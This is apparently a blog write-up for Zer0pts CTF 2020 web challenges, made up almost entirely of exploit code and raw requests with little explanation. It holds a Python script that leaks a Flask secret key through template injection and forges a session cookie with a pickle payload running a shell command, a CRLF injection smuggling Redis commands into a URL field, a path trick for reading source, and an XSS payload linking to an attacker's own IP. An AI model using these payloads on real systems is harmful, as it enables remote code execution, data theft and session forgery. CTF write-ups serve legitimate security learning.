Zer0pts CTF 2020 Writeup

CTF/Writeup

Zer0pts CTF 2020 Writeup

JeonYoungSin 2020. 3. 8. 22:39

NorePad

exploit.py

#-*- coding: utf-8 -*-
import sys
from hashlib import sha1
from flask.sessions import session_json_serializer
from itsdangerous import URLSafeTimedSerializer
import requests
import pickle
import base64
import __builtin__
import re

def getKey():
    url = "http://3.112.201.75:8001/gg"
    headers = {"Referer":"http://3.112.201.75:8001/{{config}}"}
    c = requests.get(url,headers=headers).text
    p = re.compile("b&#39;.*?,")
    print "Secret_key =" +  p.findall(c)[0][:-1].replace("&#39;","'")

def getFlag(key):
    if key == "":
        print "No Input Key"
        exit()

    secret_key = key # input
    s = URLSafeTimedSerializer(
        secret_key, salt='cookie-session',
        serializer=session_json_serializer,
        signer_kwargs={'key_derivation': 'hmac', 'digest_method': sha1}
    )

    class exploit(object):
        def __reduce__(self):
            p = "__import__('os').popen('cat flag').read()"
            return (__builtin__.eval, (p,))

    payload = base64.b64encode(pickle.dumps([{"date": "123", "text": "555", "title": exploit()}]))

    session_data = {"savedata":payload}
    session = s.dumps(session_data)
    print "[*] Encrypted Session is = " + session

    url = "http://3.112.201.75:8001/"
    headers = {"Cookie":"session="+session}
    c = requests.get(url,headers=headers).text
    p = re.compile("zer0pts.*}")
    print "[*]Flag = " + p.findall(c)[0]

session_key =  getKey()
session_key = b'\\\xe4\xed}w\xfd3\xdc\x1f\xd72\x07/C\xa9I'
getFlag(session_key)

Can You Guess It?

Payload = http://3.112.201.75:8003/index.php/config.php/%81?source=1

URL Scan

payload

1) Flag Setting

POST / HTTP/1.1
Host: 18.179.178.246:8004
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

url=url=abcd%0d%0arename%20flag%201234567890aabbce%0d%0asetrange%201234567890aabbce%207%20'_'%20%0d%0asetrange%201234567890aabbce%2035%20'_'%20

2) Get Flag

http://18.179.178.246:8004/?p=1234567890aabbce

MusicBlog

Payload

POST /new_post.php HTTP/1.1
Host: 18.179.178.246:8005
Content-Length: 123
Cache-Control: max-age=0
Origin: http://18.179.178.246:8005
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://18.179.178.246:8005/new_post.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=5b54a2f98b67bde15fdfadf26f4c256d
Connection: close

title=bbsss&content=[["><a/udio href="http://my_ip" id="like">]]